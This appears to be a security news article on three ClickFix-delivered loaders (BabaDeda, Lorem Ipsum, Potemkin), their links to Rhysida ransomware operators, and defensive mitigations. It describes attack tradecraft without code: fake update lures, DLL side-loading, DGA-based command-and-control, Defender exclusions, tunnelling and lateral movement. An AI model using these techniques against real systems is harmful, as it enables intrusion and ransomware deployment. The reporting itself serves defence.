PROBABLYPWNED
MalwareJuly 1, 20264 min read

ClickFix Campaigns Deliver Three New Ransomware-Linked Loaders

BabaDeda, Lorem Ipsum, and Potemkin loaders emerge from ClickFix social engineering attacks, deploying infostealers and linking to Rhysida ransomware operations.

James Rivera

ClickFix-style attacks—where users are tricked into running malicious PowerShell commands—have spawned three new loader families since February. Each takes a different approach to evading detection, but they share a common endpoint: deploying stealers, RATs, and ransomware tooling.

Security researchers at Proofpoint documented BabaDeda, Lorem Ipsum, and Potemkin loaders across campaigns targeting education, finance, legal services, and construction sectors. The loaders represent an evolution in the ClickFix playbook, which has grown from a novelty social engineering trick into a reliable infection vector for multiple threat actors.

How ClickFix Works

ClickFix attacks present users with fake error messages or security warnings, then instruct them to copy and paste commands into a Run dialog or PowerShell window. The technique bypasses email attachment filters, download warnings, and mark-of-the-web protections because the user manually executes the payload.

We've seen similar social engineering tactics proliferate across phishing campaigns this year. The ClickFix variant specifically exploits user confusion around technical error messages—victims believe they're fixing a problem rather than installing malware.

BabaDeda Loader

Observed since April 2026, BabaDeda targets education and financial organizations through fake browser security updates. The loader profiles the host system before retrieving payloads, checking for Russian or Belarusian system locales and security products.

BabaDeda delivers a .NET backdoor that harvests browser artifacts, system information, and establishes encrypted command-and-control channels. Secondary payloads include DanaBot and SectopRAT, deployed via DLL side-loading through a component researchers call "Storage Crypter."

The loader traces its lineage to a crypter service first documented in November 2021, but the 2026 variant has expanded into a more capable platform with enhanced evasion and payload flexibility.

Lorem Ipsum Loader

Active since February 2026, Lorem Ipsum spreads through compromised WordPress sites in the architecture, legal services, and construction sectors. The delivery mechanism mimics Microsoft Edge security updates, prompting users to run commands that download ZIP files containing an outdated Node.js runtime (version 7.10.1 from 2017).

The attack chain runs: JavaScript dropper to batch script to DLL side-loading, culminating in the Lorem Ipsum backdoor. Proofpoint attributes this loader to Vanilla Tempest (also tracked as Rapid Brigantine or Vice Society), a threat actor with documented ties to Rhysida, BlackCat, Zeppelin, and Quantum Locker ransomware.

The choice of outdated Node.js is deliberate—older runtimes lack security hardening present in modern versions, and the specific version used predates multiple sandbox and permission improvements.

Potemkin Loader

The newest of the three, Potemkin was detected last month delivering EtherRAT and RMMProject remote access tools. Its distinguishing feature is a custom domain generation algorithm (DGA) with a built-in 1,000-word dictionary for C2 discovery.

Potemkin uses reflective in-memory module loading to avoid disk writes and implements custom byte ciphers to protect communications. Post-exploitation activity includes configuring Microsoft Defender exclusions, deploying Chisel reverse SOCKS tunnels, establishing Cloudflare tunnels, and spreading laterally across 11+ hosts using WMIExec and SMBExec.

The loader generates victim identifiers via unique UUIDs stored in %LOCALAPPDATA%\hyper-v.ver, enabling operators to track specific infections across the campaign.

Connection to Ransomware Operations

Lorem Ipsum's link to Vanilla Tempest is particularly concerning. The threat actor has operated multiple ransomware affiliate programs, and the loader chain "culminates in handoff to established post-exploitation tooling and ultimately to documented ransomware deployments, primarily Rhysida," according to researchers.

This mirrors broader trends we've covered in ransomware ecosystem reporting—initial access operations increasingly specialize, with dedicated teams handling social engineering and loader deployment before handing off to ransomware operators.

Defending Against ClickFix

User awareness remains the primary defense. Security teams should alert staff that legitimate software never asks users to paste commands into PowerShell or terminal windows. Specific mitigations include:

  1. Block PowerShell execution from Run dialogs via AppLocker or Windows Defender Application Control
  2. Monitor for powershell.exe spawned with encoded commands or web-download patterns
  3. Alert on Node.js execution from user directories
  4. Track browser extension installations via enterprise policy

For organizations in targeted sectors—education, finance, legal, construction—the threat level warrants proactive hunting for BabaDeda, Lorem Ipsum, and Potemkin indicators. The loaders' connection to ransomware operations elevates the risk beyond typical infostealer infections.

Related Articles